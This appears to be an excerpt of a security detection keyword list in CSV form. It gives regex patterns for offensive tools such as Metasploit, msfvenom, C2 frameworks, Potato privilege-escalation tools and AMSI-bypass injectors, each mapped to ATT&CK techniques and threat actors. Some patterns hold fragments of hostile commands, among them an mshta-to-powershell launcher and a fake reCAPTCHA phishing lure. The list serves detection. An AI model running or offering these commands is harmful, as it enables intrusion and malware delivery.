"*msfdb --use-defaults*",".{0,1000}msfdb\s\-\-use\-defaults.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52361"
"*msfdb_helpers*",".{0,1000}msfdb_helpers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52362"
"*msfencode*",".{0,1000}msfencode.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52363"
"*msfJavaToolkit*",".{0,1000}msfJavaToolkit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52364"
"*msf-json-rpc.*",".{0,1000}msf\-json\-rpc\..{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52365"
"*msf-json-rpc.ru*",".{0,1000}msf\-json\-rpc\.ru.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52366"
"*msflag.ps1*",".{0,1000}msflag\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52367"
"*MsfModule*",".{0,1000}MsfModule.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52368"
"*msfmodule.py*",".{0,1000}msfmodule\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52369"
"*MsfModuleAsFunction*",".{0,1000}MsfModuleAsFunction.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","52370"
"*msfpattern.*",".{0,1000}msfpattern\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52371"
"*msfpayload*",".{0,1000}msfpayload.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52372"
"*msfpc.sh*",".{0,1000}msfpc\.sh.{0,1000}","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","N/A","10","1261","274","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z","52373"
"*msfrelay.py*",".{0,1000}msfrelay\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52375"
"*msf-revhttps*",".{0,1000}msf\-revhttps.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","52376"
"*MSFRottenPotato*",".{0,1000}MSFRottenPotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52377"
"*MSFRottenPotato.*",".{0,1000}MSFRottenPotato\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52378"
"*MSFRottenPotato.dll*",".{0,1000}MSFRottenPotato\.dll.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","52379"
"*MSFRottenPotato.exe*",".{0,1000}MSFRottenPotato\.exe.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","52380"
"*MSFRottenPotatoTestHarness.exe*",".{0,1000}MSFRottenPotatoTestHarness\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","1","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","52381"
"*MSFRottenPotatoTestHarness.exe*",".{0,1000}MSFRottenPotatoTestHarness\.exe.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","52382"
"*msf-sgn.raw*",".{0,1000}msf\-sgn\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","52383"
"*msfshellcode_payload.bin*",".{0,1000}msfshellcode_payload\.bin.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","52384"
"*msfstaged.exe *",".{0,1000}msfstaged\.exe\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","52385"
"*msfupdate*",".{0,1000}msfupdate_spec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52386"
"*msfvemonpayload*",".{0,1000}msfvemonpayload.{0,1000}","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","N/A","10","10","38","10","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z","52387"
"*msfvenom *",".{0,1000}msfvenom\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52388"
"*msfvenom -*",".{0,1000}msfvenom\s\-.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52389"
"*msfvenom -*",".{0,1000}msfvenom\s\-.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52390"
"*--msfvenom *",".{0,1000}\-\-msfvenom\s.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","52391"
"*msfvenom -p *",".{0,1000}msfvenom\s\-p\s.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","52392"
"*msfvenom -p *",".{0,1000}msfvenom\s\-p\s.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","52393"
"*msfvenom -p *",".{0,1000}msfvenom\s\-p\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","52394"
"*msfvenom -p windows/x64/exec*",".{0,1000}msfvenom\s\-p\swindows\/x64\/exec.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","52395"
"*msfwrapper.erb*",".{0,1000}msfwrapper\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","52396"
"*Mshikaki.exe*",".{0,1000}Mshikaki\.exe.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","52398"
"*Mshikaki-main*",".{0,1000}Mshikaki\-main.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","52399"
"*mshta*I am not a robot - *Verification ID: *",".{0,1000}mshta.{0,1000}I\sam\snot\sa\srobot\s\-\s.{0,1000}Verification\sID\:\s.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","https://x.com/skocherhan/status/1888762808948367410/photo/2","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","52406"
"*mshta.exe vbscript:createobject(`""wscript.shell`"").run(`""powershell *",".{0,1000}mshta\.exe\svbscript\:createobject\(\`\""wscript\.shell\`\""\)\.run\(\`\""powershell\s.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","52409"
"*mshta.exe*I am not a robot - reCAPTCHA Verification ID: *",".{0,1000}mshta\.exe.{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","52416"
"*mshta/shellcode_inject*",".{0,1000}mshta\/shellcode_inject.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","52417"
